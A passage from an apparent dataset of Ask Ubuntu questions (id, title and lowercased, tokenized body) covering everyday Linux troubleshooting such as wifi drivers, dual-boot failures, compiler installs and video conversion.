004 device 002 : id 046d : c52b logitech , inc. unifying receiver please request/instruct as necessary .
370709	asus eee pc with strange , irreplaceable o.s	my asus eee pc 4g has a special o.s . that i want to replace with ubuntu 12.04 . how to do it ? it ignores 12.04 on a live usb . the bios says the : [ removable dev . ] has been disabled in the corresponding type menu . where is this , and how do i enable it ? that was the boot menu . i ca n't change anything there . it says it has a type menu , presumably of devices which ought to be bootable , but i don`t know where to find that . the model is a 'eee pc 4g ' according to the label .
370712	my ubuntu wo n't install g++ but will install g++ 4.6 and g++ 4.7	could someone please tell me a sure-way of getting g++ and g++4.7 on to my ubuntu ? i have spent the whole day trying lots of sudo apt-get and nothing has worked . when compiling from the ide i am missing g++ as i get the compiler error : âmake [ 2 ] : g++ : command not foundâ if i do : sudo update-alternatives -- config g++ it returns : update-alternatives : error : no alternatives for g++ . if i do : g++ -- version it returns : the program 'g++ ' can be found in the following packages : * g++ * pentium-builder try : sudo apt-get install < selected package > i already have gcc 4.8 but i need g++ 4.7 ( and possibly 4.8 if someone could advise me how i can download that ? ) because my code ( which i did manage to compile with 4.7 earlier ) is giving a compiler bug internal error . ( i havent been able to list every command i tried as there 's been so many ) . there must be a way which definitely works edit : have run to get g++ 4.6 so now when i call the g++ -- version i get 4.6 showing . i then tried sudo apt-get install g++-4.7 to `` upgrade '' to 4.7 but this seemed to lose my g++ because i couldnt do g++ -- version afterwards . i reverted back to 4.6 . how can i upgrade to 4.7 and i really need to know how to get g++ 4.8 ?
370714	the software center will not load , it starts and then phases out	this is the error message that i get : e : the update command takes no arguments i executed this command : sudo apt-get update or upgrade ? ? ? when i run the command : cat /etc/apt/sources.list i get the following results : cat : /ect/apt/sources.list : no such file or directory please advise .
370715	how to increase size allocated to a user	i am using dual boot with ubuntu / windows . i am currently working under ubuntu and trying to download some files to my desktop . the problem is that the download fails due to insufficient space . when i run the disk usage analyzer , i see the following : total filesystem capacity : 115.2 gb ( used : 32.3 gb available : 82.9 gb ) however , the size allocated to my user ( /home/fshelly/ ) appears to be only 9.9 gb which exceeds the amount of the files that i 'd like to download . is there any way to increase the 9.9 gb so that i can download without any problem ? thank you
370718	after installing ubuntu , all my partitions are gone . boot-repair log	i have an hp pavilion sleekbook that came with windows 8 pre-installed . i had trouble dual booting after installing ubuntu , so i disabled safeboot on bios and proceeded to try boot-repair , nothing happened . no dual boot yet . so i tried to reinstall ubuntu , but without the manual partitioning . so i chose to erase ubuntu 13 and reinstall it . instead it deleted all my hp recovery partitions and windows as well . here is the log of boot-repair . http : //paste.ubuntu.com/6354919/ gparted and fdisk only show one partition : /dev/sda1 i am wondering if you could suggest any way of recovering my windows partition and have a working windows 8 again ? i need some information there with urgency . if you could help me i will be welcome . i am desperated . thanks
370723	custom russian phonetic keyboard	i tried to custom russian phonetic keyboard through terminal . to do this i wrote : cd /usr/share/x11/xkb/symbols/ then : sudo gedit ru the document `` ru ( /usr/share/x11/xkb/symbols ) - gedit `` appeared on the desktop . i changed all the keys that suited me , saved the file and restarted the computer . however , the changes did n't work out . i checked the document again . the changes are there , but the keys still code for the old layout . i think i am missing some important point . please help . by the way i get in terminal this message : ** ( gedit:14887 ) : warning ** : could not load gedit repository : typelib file for namespace 'gtksource ' , version '3.0 ' not found ( gedit:14887 ) : ibus-warning ** : the owner of /home/roma/.config/ibus/bus is not root ! what does this mean ?
370726	conky graphs out of the graph border	i 'm having a strange issue with conky.. it 's hard to explain but basically the graphs are moving outside of their border . my '.conkyrc ' can be found here : http : //pastebin.com/nwpvjkjb does anyone know how i can fix this problem ? i ca n't seem to find any solution i 'm running ubuntu 13.10 64-bit
370735	how can i increase the refresh rate ?	i have an old gx270 with an integrated intel 82865g . it runs smoothly my winxp with a refresh rate of 75 , or even 85 . however , ubuntu ( 12.04 ) only gives me 60 . i understand this card is not longer supported , but i also know the rate could be increased ... though i do n't know how . any advise ? ( besides buying another cpu/card )
370737	p11-kit : typical problem with wine	i 've installed wine 1.7 with winetricks on ubuntu 13.10 saucy salamander . i 've tried to launch any .exe files , but still is a problem : p11-kit : could n't load module : /usr/lib/i386-linux-gnu/pkcs11/p11-kit-trust.so : /usr/lib/i386-linux-gnu/pkcs11/p11-kit-trust.so : can not open shared object file : no such file or directory i 've found a few tips , but anything does n't work . how can i solve it ? regards .
370739	failed to run existing win7 in ubuntu 12.04	$ sudo fdisk -l /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- /dev/sda2 206848 409602047 204697600 7 hpfs/ntfs/exfat -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - /dev/sda3 409604094 675790847 133093377 f w95 ext 'd ( lba ) - /dev/sda5 409604096 550834175 70615040 7 hpfs/ntfs/exfat - /dev/sda6 550836224 591792127 20477952 7 hpfs/ntfs/exfat - /dev/sda7 591794176 631791615 19998720 83 linux - /dev/sda8 631793664 671791103 19998720 83 linux - /dev/sda9 671793152 675790847 1998848 82 linux swap / solaris $ sudo usermod -a -g disk cuore $ vboxmanage internalcommands createrawvmdk -filename win7.vmdk -rawdisk /dev/sda -partitions 1,2 raw host disk access vmdk file win7.vmdk created successfully . now when i try to run the created virtual machine i get a black screen . so this is the log file : http : //pastebin.com/gskw2dam how to fix this ?
370741	how to rename a batch of files via cli when spaces are involved	i have a whole bunch of files that are like so : x54y65.dat and i want to prefix them with a specific phrase so that they look like so : some prefix - x54y65.dat its that space after the hyphen that 's getting me . i tried : mv * some\ prefix\ -\ * but that did n't work . how do i do it ? thanks
370742	how to refresh display on ubuntu 12.04	so does ubuntu 12.04 have the windows equivalent to the `` connect to projector '' key functionality . i have a hardware problem on my laptop where the lcd screen goes white ( and i know at some point i have to change the cables or maybe the screen ) . but on windows i can simply press the `` connect to projector '' key ( the f1 key in my case ) and i get back the display and it works 9/10 times . is there a way to do something similar in ubuntu 12.04 ? plus i cant do anything complicated like opening up terminal or any application , because i dont have the display . so it has to be 1 or 2 keystrokes . thanks .
370745	i ca n't modify user accounts in ubuntu 13.10	in ubuntu 13.10 why ca n't i modify user accounts if i 'm an administrator ? it simply gets stuck when i click on user accounts .
370747	how do i install ubuntu and windows 7 on different hard drives , so that win 7 can still hibernate ?	i currently hard two hard drives , the first-booting drive with grub/ubuntu ( 12.04 ) and the second drive with win 7 . however , win 7 does n't like being the second drive ( it expects to be the first ) and does n't hibernate . i found solutions which involve changing grub files ( didnt work ) and also setting the windows partition to be `` boot '' in gparted ( also didnt work ) . the strangest thing is that this was raised as a bug fix in 2012 so i am confused why i still get this issue . anyway ! is there a way in which i can re-setup my system to avoid this problem ? both my oses do n't have much on them so i dont mind re-installing everything if it means i can hibernate my win 7 and have both oses on different drives . i were n't sure if it was better that i avoid grub and use the win 7 boot manager ? ?
370748	64bit support for lts hardware enabled stack opt-in	i see there are already people , who are attempting to use or already using the hardware enabled stack for precise running a 64bit system ( e.g . here ) . however , the official announcement currently claims this is not supported . i wonder why 64 bit is not supported and if this will change any time soon ?
370750	internal wifi adaper not working	i am fairly new to linux and i have been trying without avail for the past couple of days now to get my internal wifi to work . i am running 13.10 my wifi card is intel corporation centrino wireless-n 2230 the device does not show up at all in rfkill and when i run i just get 0 : hci0 : bluetooth soft blocked : no hard blocked : no what i get when i run sudo lshw -c network is *-network description : network controller product : centrino wireless-n 2230 vendor : intel corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : c4 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=iwlwifi latency=0 resources : irq:45 memory : b1000000-b1001fff *-network description : ethernet interface product : ar8161 gigabit ethernet vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:07:00.0 logical name : eth0 version : 10 serial : 08:9e:01 : b7:29 : ac capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm pciexpress msi msix bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=alx latency=0 link=no multicast=yes port=twisted pair resources : irq:48 memory : b2500000-b253ffff ioport:3000 ( size=128 ) *-network description : wireless interface physical id : 3 bus info : usb @ 3:3 logical name : wlan1 serial : ec:1a:59 : a6:8a:28 capabilities : ethernet physical wireless configuration : broadcast=yes driver=r8712u ip=192.168.1.105 multicast=yes wireless=ieee 802.11bg also i can access wifi with an external usb network adapter by belkin and i can access the network through ethernet . any help in troubleshooting this further or fixing would be greatly appreciated ! -matt for dmesg | grep iwl i get [ 16.496662 ] iwlwifi 0000:01:00.0 : ca n't disable aspm ; os does n't have aspm control [ 16.497103 ] iwlwifi 0000:01:00.0 : irq 45 for msi/msi-x [ 16.734042 ] iwlwifi 0000:01:00.0 : loaded firmware version 18.168.6.1 op_mode iwldvm [ 16.739327 ] iwldvm : disagrees about version of symbol ieee80211_start_tx_ba_cb_irqsafe [ 16.739329 ] iwldvm : unknown symbol ieee80211_start_tx_ba_cb_irqsafe ( err -22 ) [ 16.739331 ] iwldvm : disagrees about version of symbol ieee80211_report_wowlan_wakeup [ 16.739332 ] iwldvm : unknown symbol ieee80211_report_wowlan_wakeup ( err -22 ) [ 16.739336 ] iwldvm : disagrees about version of symbol ieee80211_chswitch_done [ 16.739337 ] iwldvm : unknown symbol ieee80211_chswitch_done ( err -22 ) [ 16.739355 ] iwldvm : disagrees about version of symbol ieee80211_free_hw [ 16.739356 ] iwldvm : unknown symbol ieee80211_free_hw ( err -22 ) [ 16.739359 ] iwldvm : disagrees about version of symbol ieee80211_get_tkip_p2k [ 16.739360 ] iwldvm : unknown symbol ieee80211_get_tkip_p2k ( err -22 ) [ 16.739362 ] iwldvm : disagrees about version of symbol ieee80211_alloc_hw [ 16.739363 ] iwldvm : unknown symbol ieee80211_alloc_hw ( err -22 ) [ 16.739369 ] iwldvm : disagrees about version of symbol ieee80211_register_hw [ 16.739370 ] iwldvm : unknown symbol ieee80211_register_hw ( err -22 ) [ 16.739380 ] iwldvm : unknown symbol __ieee80211_create_tpt_led_trigger ( err 0 ) [ 16.739382 ] iwldvm : disagrees about version of symbol ieee80211_restart_hw [ 16.739383 ] iwldvm : unknown symbol ieee80211_restart_hw ( err -22 ) [ 16.739385 ] iwldvm : disagrees about version of symbol ieee80211_rate_control_unregister [ 16.739385 ] iwldvm : unknown symbol ieee80211_rate_control_unregister ( err -22 ) [ 16.739391 ] iwldvm : unknown symbol __ieee80211_get_radio_led_name ( err 0 ) [ 16.739400 ] iwldvm : disagrees about version of symbol ieee80211_wake_queue [ 16.739401 ] iwldvm : unknown symbol ieee80211_wake_queue ( err -22 ) [ 16.739413 ] iwldvm : disagrees about version of symbol ieee80211_find_sta [ 16.739414 ] iwldvm : unknown symbol ieee80211_find_sta ( err -22 ) [ 16.739415 ] iwldvm : disagrees about version of symbol ieee80211_iter_keys [ 16.739416 ] iwldvm : unknown symbol ieee80211_iter_keys ( err -22 ) [ 16.739423 ] iwldvm : disagrees about version of symbol wiphy_rfkill_set_hw_state [ 16.739424 ] iwldvm : unknown symbol wiphy_rfkill_set_hw_state ( err -22 ) [ 16.739501 ] iwldvm : disagrees about version of symbol ieee80211_enable_rssi_reports [ 16.739502 ] iwldvm : unknown symbol ieee80211_enable_rssi_reports ( err -22 ) [ 16.739503 ] iwldvm : disagrees about version of symbol ieee80211_stop_tx_ba_cb_irqsafe [ 16.739504 ] iwldvm : unknown symbol ieee80211_stop_tx_ba_cb_irqsafe ( err -22 ) [ 16.739507 ] iwldvm : disagrees about version of symbol ieee80211_ave_rssi [ 16.739507 ] iwldvm : unknown symbol ieee80211_ave_rssi ( err -22 ) [ 16.739511 ] iwldvm : disagrees about version of symbol ieee80211_sta_block_awake [ 16.739512 ] iwldvm : unknown symbol ieee80211_sta_block_awake ( err -22 ) [ 16.739515 ] iwldvm : disagrees about version of symbol ieee80211_remain_on_channel_expired [ 16.739516 ] iwldvm : unknown symbol ieee80211_remain_on_channel_expired ( err -22 ) [ 16.739522 ] iwldvm : unknown symbol ieee80211_rx ( err 0 ) [ 16.739529 ] iwldvm : disagrees about version of symbol ieee80211_wake_queues [ 16.739530 ] iwldvm : unknown symbol ieee80211_wake_queues ( err -22 ) [ 16.739534 ] iwldvm : disagrees about version of symbol ieee80211_rate_control_register [ 16.739535 ] iwldvm : unknown symbol ieee80211_rate_control_register ( err -22 ) [ 16.739537 ] iwldvm : disagrees about version of symbol ieee80211_free_txskb [ 16.739538 ] iwldvm : unknown symbol ieee80211_free_txskb ( err -22 ) [ 16.739549 ] iwldvm : disagrees about version of symbol ieee80211_tx_status [ 16.739550 ] iwldvm : unknown symbol ieee80211_tx_status ( err -22 ) [ 16.739551 ] iwldvm : disagrees about version of symbol ieee80211_stop_queue [ 16.739552 ] iwldvm : unknown symbol ieee80211_stop_queue ( err -22 ) [ 16.739553 ] iwldvm : disagrees about version of symbol ieee80211_ready_on_channel [ 16.739554 ] iwldvm : unknown symbol ieee80211_ready_on_channel ( err -22 ) [ 16.739556 ] iwldvm : disagrees about version of symbol ieee80211_stop_queues [ 16.739557 ] iwldvm : unknown symbol ieee80211_stop_queues ( err -22 ) [ 16.739565 ] iwldvm : disagrees about version of symbol ieee80211_scan_completed [ 16.739566 ] iwldvm : unknown symbol ieee80211_scan_completed ( err -22 ) [ 16.739569 ] iwldvm : disagrees about version of symbol rate_control_send_low [ 16.739570 ] iwldvm : unknown symbol rate_control_send_low ( err -22 ) [ 16.739574 ] iwldvm : disagrees about version of symbol ieee80211_unregister_hw [ 16.739575 ] iwldvm : unknown symbol ieee80211_unregister_hw ( err -22 ) [ 16.739577 ] iwldvm : disagrees about version of symbol ieee80211_resume_disconnect [ 16.739577 ] iwldvm : unknown symbol ieee80211_resume_disconnect ( err -22 ) [ 16.739581 ] iwldvm : disagrees about version of symbol ieee80211_beacon_get_tim [ 16.739582 ] iwldvm : unknown symbol ieee80211_beacon_get_tim ( err -22 ) [ 16.739590 ] iwldvm : disagrees about version of symbol ieee80211_request_smps [ 16.739590 ] iwldvm : unknown symbol ieee80211_request_smps ( err -22 ) [ 16.739601 ] iwldvm : disagrees about version of symbol ieee80211_disable_rssi_reports [ 16.739602 ] iwldvm : unknown symbol ieee80211_disable_rssi_reports ( err -22 ) [ 16.739707 ] iwlwifi 0000:01:00.0 : failed to load module iwldvm ( error 256 ) , is dynamic loading enabled ?
370752	how to disable unity window open/close animation ? ( no third party software )	i am wondering how i can disable the maximize/minimize animation for ubuntu 13.10 . i know there are other questions like this , but they are either directed to different ubuntu types , ( kubuntu , etc ) or they are recommending third party software ( unity tweak tool ) . i would like to disable this with a built in option , if possible . if not , what would be the best application to do this ? thanks
370758	rosetta stone permissions problem	i 'm trying to run the online version of rosetta stone for a class that i am taking , but it does n't work . i get to this page and on the adobe flash player settings box that pops up , nothing works . i try to click on the allow box but nothing happens . i am running 13.10 . any suggestions ? ( sorry , i do n't have enough reputation to post a pic . )
370766	disabling password prompt once logged in , ubuntu 13.10	i 'm running ubuntu 13.10 . i like having my home folder encrypted , and i also like having my account password-protected . but i was wondering if it was possible to not have to re-enter the password after the initial log on . thanks for taking the time to read my question , sincerely , a noob
370768	what can i do when on a used computer i can not enter the administrator account ?	i recently purchased a used computer , and the owner could not remember the administrater password . it has 13.04 on it .
370769	win7 and ubuntu lost after installing ubuntu 12.04 and win7 dual system , i have no os on my laptop now	here is the procedure : in the morning i installed ubuntu using a usb directly without config any thing to my win7 system . after install complete , ubuntu installation software tell me to reboot.and everything is just find . while rebooting , there is no ubuntu system for me to select , and my laptop go straight to log in using win7 . no ubuntu shows on win7 's configuration ( default system ) . log in ubuntu using usb ( try ubuntu without installation ) , i can find ubuntu 's filesystem was already there . formatting the disk on win7 's disk management , rearranging them to other disk.still having no trouble with win7 . in the afternoon try a few times of installation and uninstallation of ubuntu . still shows no sign of selecting ubuntu system . in the evening another trial while installing ubuntu with the third option of : installing ubuntu alongside with inw7 , erase win7 and install ubuntu . somethingelse -- - my check failed with configuartion for what comes out with the 'something else ' option , reboot . and i have no system now with some cmd tips say : reboot and select proper boot device or insert boot media in selected boot device and press a key . files those on win7 's orginal file system and ubuntu filesystem can still be found when i 'try ubuntu without installation ' . 5.but i just got no os when i reboot my laptop normally .
370773	wireless drops on hp envy dv6 with rt3290 wireless , worked without problem prior to upgrading to ubuntu 13.10 , can it be fixed ? yes	i have a hp envy dv6 notebook pc with an amd a10 quad core and rt3290 wireless . since i upgraded from ubuntu 13.04 to 13.10 , the wireless connects , but then drops after a few minutes or longer , whether or not i am running openconnect to get through a vpn . if i attempt to run a remote x client ( e.g . remote xterm ) it drops . if i do n't run an x client , it disconnects after a while , requiring a reload of the driver and reconnect . wireless info ... sudo lshw -c network *-network description : wireless interface product : rt3290 wireless 802.11n 1t/1r pcie vendor : ralink corp. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 00 serial : 68:94:23 : a7:09 : cb width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rt2800pci driverversion=3.11.0-12-generic firmware=0.37 ip=192.168.1.115 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:55 memory : f0210000-f021ffff i have successfully built and installed the mediatek driver with no luck on connecting , then the system hangs on reboot and i have to recover/undo the changes to boot successfully . 2013/11/10 update ... i discovered that running a popular speed test on the web is a quick way to get the wireless to disconnect during the upload portion of the test . using the aforementioned method to reproduce the problem , i have installed and tested the linux kernel 3.12 release as documented here on my ubuntu 13.10 system and thus far i have not see the problem with wireless disconnecting again ...
370774	installing ubuntu on virtualbox with a windows 8 host	installing ubuntu-13.10-desktop-i386.iso gets me to the graphical login screen but after i enter the password i get a black screen . ctrl-alt-f2 brings me to a terminal where i can restart lightdm , enter my password again to see another black screen . the screen saver can actually kick into action there and i was told to update packages , but no unity or other ui , just blackenss . the host is windows8-x64 and virtualbox 4.3.2 . i tried installing ubuntu-12.04.3-desktop-i386.iso but that hung during setup . is there a way to debug ? i 'm now trying to install debian to see if that works but wow the network installer takes its sweet time ... update : debian does work though it gives me a notification that gnome 3 failed to load . the visual desktop works though so i do n't know if there was a substantive problem .
370776	can nautilus ' recursive search show the full path of results ?	in nautilus 3.8 ( in ubuntu saucy/13.10 ) , if i just start typing , nautilus will automatically search through tracker 's database and present me with recursive search results . but by default , there is no way to differentiate different results with the same name . is there a setting or extension that will display the full path of search results alongside each result ?
370781	grab sound of a sdl game with ffmpeg/avconv	i 'm trying to make a screencast of a sdl game which i developed some years ago , with the following command : sleep 5 & & avconv -f x11grab -s 1366x768 -r 25 -i :0.0 -same_quant screen_cast.mkv ( in this 5 seconds of sleep , i open the game ) . but the generated video ( screen_cast.mkv ) does n't capture audio . i use for my game the sdl_mixer library , with default configuration ( 22050 for frequency , audio_s16sys for format , and 2 channels ) . what 's the problem ? ( with options -f alsa -i pulse it does n't work either ) .
370783	openssl/rand.h header file not found	i have installed libssl-dev package but that did not install the include files . how do i get the openssl include files ? appreciate your help . checking for program g++ or c++ : /usr/bin/g++ checking for program cpp : /usr/bin/cpp checking for program ar : /usr/bin/ar checking for program ranlib : /usr/bin/ranlib checking for g++ : ok checking for node path : ok /usr/bin/node checking for node prefix : ok /usr checking for header openssl/rand.h : not found /home/arun/documents/webserver/node_modules/bcrypt/wscript:30 : error : the configuration failed ( see '/home/arun/documents/webserver/node_modules/bcrypt/build/config.log ' ) npm err ! error installing bcrypt @ 0.7.7 npm err ! bcrypt @ 0.7.7 preinstall : `node-waf clean || ( exit 0 ) ; node-waf configure build` npm err ! `sh `` -c '' `` node-waf clean || ( exit 0 ) ; node-waf configure build '' ` failed with 1 npm err ! npm err ! failed at the bcrypt @ 0.7.7 preinstall script . npm err ! this is most likely a problem with the bcrypt package , npm err ! not with npm itself . npm err ! tell the author that this fails on your system : npm err ! node-waf clean || ( exit 0 ) ; node-waf configure build npm err ! you can get their info via : npm err ! npm owner ls bcrypt npm err ! there is likely additional logging output above . npm err ! npm err ! system linux 3.8.0-32-generic npm err ! command `` node '' `` /usr/bin/npm '' `` install '' npm err ! cwd /home/arun/documents/webserver npm err ! node -v v0.6.12 npm err ! npm -v 1.1.4 npm err ! code elifecycle npm err ! message bcrypt @ 0.7.7 preinstall : `node-waf clean || ( exit 0 ) ; node-waf configure build` npm err ! message `sh `` -c '' `` node-waf clean || ( exit 0 ) ; node-waf configure build '' ` failed with 1 npm err ! errno { } npm err ! npm err ! additional logging details can be found in : npm err ! /home/arun/documents/webserver/npm-debug.log npm not ok
370786	how to convert avi ( xvid ) to mkv or mp4 ( h264 )	very noob when it comes to video . i 'm trying to make sense of what i '' m finding via google ... but its mostly greek to me . i have a bunch of avi files that wo n't play in my wd tv play box . mediainfo tells me they are xvid . specs for the box show that should be fine ... but digging through forums says its hit-and-miss . so i 'd like to try converting them to h264 encoded mkv or mp4 files . i gather avconv is the tool , but reading the manual just has me really really confused . i tried the very basic example of : avconv -i file.avi -c copy file.mp4 it took less than 4 seconds . and it worked ... sort of . it `` played '' in that something came up on the screen ... but there was horrible artifacting and scenes would just sort of melt into each other . i want to preserve quality if possible . i 'm not concerned about file size . i 'm not terribly concerned with the time it takes either , provided i can do them in a batch . can someone familiar with the process please give me a command with the options ? thank you for your help . i 'm posting the mediainfo in case it helps : general complete name : \\server\video\public\test.avi format : avi format/info : audio video interleave file size : 189 mib duration : 11mn 18s overall bit rate : 2 335 kbps writing application : lavf52.32.0 video id : 0 format : mpeg-4 visual format profile : advanced simple @ l5 format settings , bvop : 2 format settings , qpel : no format settings , gmc : no warppoints format settings , matrix : default ( h.263 ) muxing mode : packed bitstream codec id : xvid codec id/hint : xvid duration : 11mn 18s bit rate : 2 129 kbps width : 720 pixels height : 480 pixels display aspect ratio : 16:9 frame rate : 29.970 fps standard : ntsc color space : yuv chroma subsampling : 4:2:0 bit depth : 8 bits scan type : progressive compression mode : lossy bits/ ( pixel*frame ) : 0.206 stream size : 172 mib ( 91 % ) writing library : xvid 1.2.1 ( utc 2008-12-04 ) audio id : 1 format : mpeg audio format version : version 1 format profile : layer 3 mode : joint stereo mode extension : ms stereo codec id : 55 codec id/hint : mp3 duration : 11mn 18s bit rate mode : constant bit rate : 192 kbps channel ( s ) : 2 channels sampling rate : 48.0 khz compression mode : lossy stream size : 15.5 mib ( 8 % ) alignment : aligned on interleaves interleave , duration : 24 ms ( 0.72 video frame )
370789	the laptop 's name was change to dhcppc0	i do a clean install of ubuntu 13.04 because ubuntu 13.10 was kinda slow even it is still a fresh install . everything work well , except for the hostname i set . i set it as `` cpctc '' but everytime i login in to any terminal , it shows dhcppc0 instead of `` cpctc '' . in the forums i searched , they say it is about the network but i only connect to the wifi trough network manager . why does it changes .
370790	13.10 suspend no longer asks for login	after waking up computer from being suspended it no longer asks me to login to my account i do not have automatic login enabled by the way . i normally use a custom keyboard shortcut ( listed below ) ; however , this occurs no matter how i suspend the machine . dbus-send -- system -- print-reply \ -- dest= '' org.freedesktop.upower '' \ /org/freedesktop/upower \ org.freedesktop.upower.suspend
370792	i have cloned my hard drive ( ubuntu server ) to a bigger one	the free space still says the original hard drives amount even though i have cloned it to a 300gb drive what is bigger , i have use gparted to make the drive use the free space but still no difference i use lvm , please help
370796	juju-local and cgroup-lite	im trying to configure juju-local on my virtual-box machine to test some environments , learn , play and then make some desition to deploy to my cloud . i follow the docs on juju page ( https : //juju.ubuntu.com/docs/getting-started.html , https : //juju.ubuntu.com/docs/config-local.html ) but always get this error on any service : status : `` hook failed : install '' i do some research and use juju-debug hooks and find that the install error was on cgroup-lite . can anybody helpme ? thanks
370798	menu options for applications are all inactive	i recently upgraded to 13.10 and in trying to get some things worked out ( e.g . wireless ) , i screwed up something and now the global menu options for all my applications are grayed out , e.g . i ca n't select 'paste ' in the terminal menu even if i have some text in my clipboard . is there a fix for this ? i 'm really stuck .
370800	how do i get out of the latest version ?	this latest version i was offered an upgrade to is awful ! why was n't any overview provided ? i ca n't find menus for getting to the software i 've become used to . everything is so fuzzy . get me out of here ! ! ! ! ! ! ! ! ok , in plain sober english , how do i uninstall this scary lsd trip and get back to the version i had before ?
370804	why did my libreoffice icons change and how to i get the old ones back	libreoffice now has the icons in this screenshot and i do n't like them , i checkmarked everything in the software center for all libreoffice apps . when i saw the look i started to look for names that could have caused this weird look , but i failed . i opened terminal and uninstalled all libreoffice apps and libreoffice , then i installed libreoffice again and the icons are still there . any suggestion besides re-installing the os ( ubuntu 13.10 ) because these icons are really annoying and i do not feel at home in ubuntu with crazy office icons . thanks
370805	virtualbox ubuntu 12.04 can not open display under superuser	everytime i try to open a visual editor from the terminal as superuser , i get this error : user : ~ $ sudo gedit can not open display : run 'gedit -- help ' to see a full list of available command line options . however , when i open it normally , it works just fine . any ideas ? edit : gsuko does n't change this behaviour either edit : user : ~ $ sudo kate qdbusconnection : session d-bus connection created before qcoreapplication . application may misbehave . kate : can not connect to x server
370809	configuring ubuntu 12.04 so that it recognizes the recently installed icc compiler	i have an ubuntu 12.04 . i installed the icc compiler ( composer_xe_2013_sp1.0.080 ) but when i try to compile using it i get the message : icc : command not found . i 've read somewhere that when you install a new software you have to make something so that the os gets aware of it , like modifying the bashrc file or something , but how to do it ?
370812	setting up firebird to work with a windows app in wine	i have a windows app that i need to work in linux , i can install it in wine or playonlinx . but everytime i install the windows version of firebird , the windows app does n't pickup the database or firebird after installation . i have tried the solution at : how to install firebird on ubuntu 12.04 , but with no success . is it possible to setup the linux version of firebird to work with the windows program on the same computer ? i 'm running ubuntu 13.04 . i got it to work in virtualbox where i had xp installed in virtual and then my windows program . but since then i had problems with it . otherwise if there is no solution , would dual booting xp and ubuntu be better for what i want to do ?
370815	clonezilla not booting to pxe	i 'm trying to restore a client computer from a server running ubuntu 12.04 lts using clonezilla . i installed clonzilla from the drbl package i got from the drbl website , but i ca n't seem to get the client computers to boot properly from pxe . i 've also configured drbl and clonezilla according to the documentation on their website i 've checked var/log/syslog and the client computers seem to be receiving the request packets with no problem , but the server is n't responding to the rrq issued by the client ; my var/log/syslog just merely lists the rrq as being sent by the client . the client itself just hangs from then on . any ideas as to why my server is n't responding to the rrq ?
370816	`` invalid encoding '' error on backups created with winrar	i recently installed ubuntu . i have my files ( windows , office , jpg , etc . ) compressed in .rar . my native language is spanish . i got `` invalid encoding '' whenever i tried to decompress . i though i managed to correct it by installing utf8-migration-tool . it was all fine until ... i opened one folder and it crashed . over and over again . i tried to re-decompress and it was the same . does anyone know how can i solve it please ? i 'm a beginner with ubuntu . i really like this os ! thanks in advance . rodrigo
370817	is it possible to get netflix working with html5	i just read how chromebooks and windows 8 are now supporting html5 playback on netflix instead of silverlight . the site is still requiring users to install silverlight ( when you login from linux computers ) is it possible to emulate windows 8 or chromebook ?
370818	how to recover the deleted user 's data on ubuntu server ?	this is yugandhar reddy a , i deleted a user named sudheer in ubuntu server with the following command sudo userdel -r sudheer the above command deleted the home directory of sudheer . but i need his home directory , so what i have to do now ?
370820	can i install mt4 trading platform on ubuntu 12.04 ?	can i install mt4 trading platform on ubuntu 12.04 ? i downloaded mt4 trading platform from alpari - uk . the .exe file could not be installed on my laptop , where ubuntu 12.04 has been installed .
370821	break reminder for ubuntu ?	what is the best software for ubuntu to remind us to take a break for our eyes ( like eyeleo in windows ) .
370824	failure to install ubuntu 12.04 on usb flash drive	i need ubuntu on a flash drive in order to use citrix for linux i have tried this weekend to install ubuntu 12.04 on a 16gb usb flash drive , without apparent success . i have downloaded the iso image & installed it ( repeatedly ) using the pendrive program mentioned on the ubuntu website . the pendrive produced has been tested on fijutsu siemens & lenovo laptops - initially with very limited success ( i was faced with the install or try out screen , but only the install option would be res ; ponded to ) , finally with fatal error messages from both computers - even the 12.04 dvd live image no longer runs now . i do need the installation this week - please would any ubuntu experts advise what i am doing wrong ? i ca n't copy the error messages down as they only appear for about a second before being cleared off screen . all advice very gratefully received .
370829	application development in ubuntu using c++	i want to write applications for ubuntu . i do not know much about programming , but i want develop for ubuntu . i am trying to learn c++ right now . what do you think is the best way to develop apps for ubuntu ?
370831	adding radioswissjazz to rythmbox	i tried and pasted the stream link http : //www.radioswissjazz.ch/live/aacp.m3u but i can not have it play : always in 'paused' same for http : //tamtamdesiles.ice.infomaniak.ch/tamtamdesiles.mp3 what am i doing wrong ? thanks for your help guy
370832	12.10 problems will not boot into the desktop	so i was having problems updating from 12.04 and i 'm unsure of what i did to cause the problem but ubuntu told me there was an update to 12.10 so i tried that . and now i start the computer a purple screen appears then ubuntu logo loads but it does n't proceed to the login screen , instead i get a black screen with an _ on upper left screen and then nothing happens it just hangs there . any way i 've tried the recovery menu . and i do n't know if this will help but the the first screen says gnu grub version 2.00-7ubnutu11 and then has the options of : '' ubuntu '' '' advanced options for ubuntu '' '' memory test ( memtest68+ ) '' '' memory test ( memtest68+ , serial console 115200 ) '' and advanced options for ubuntu says : '' ubuntu , with linux 3.8.0-32-generic '' '' ubuntu , with linux 3.8.0-32-generic ( recovery mode ) '' '' ubuntu , with linux 3.5.0-42-generic '' '' ubuntu , with linux 3.5.0-42-generic ( recovery mode ) '' i just want my primary computer back , although i forgot how much i missed windows 7 how can i solve this ?
370833	tl-wn723n v3 driver install	how to get the tp-link tl-wn723n working on ubuntu ? sorry for the headache in advance ; ) , if someone could assume i do n't know anything about linux at all and help me to understand exactly what i need to do . i can confirm its rtl8188eu , i have downloaded https : //github.com/gleb-chipiga/rtl8188eu , and from there i do n't know what exactly i 'm supposed to be doing . i do n't need a complete guide on what/how to use commands , but i just need an idiots guide to doing this and i can learn quick on my own from there . edit : https : //help.ubuntu.com/community/usingtheterminal yes , i 'm learning , but about as far from % 100 as i could be .
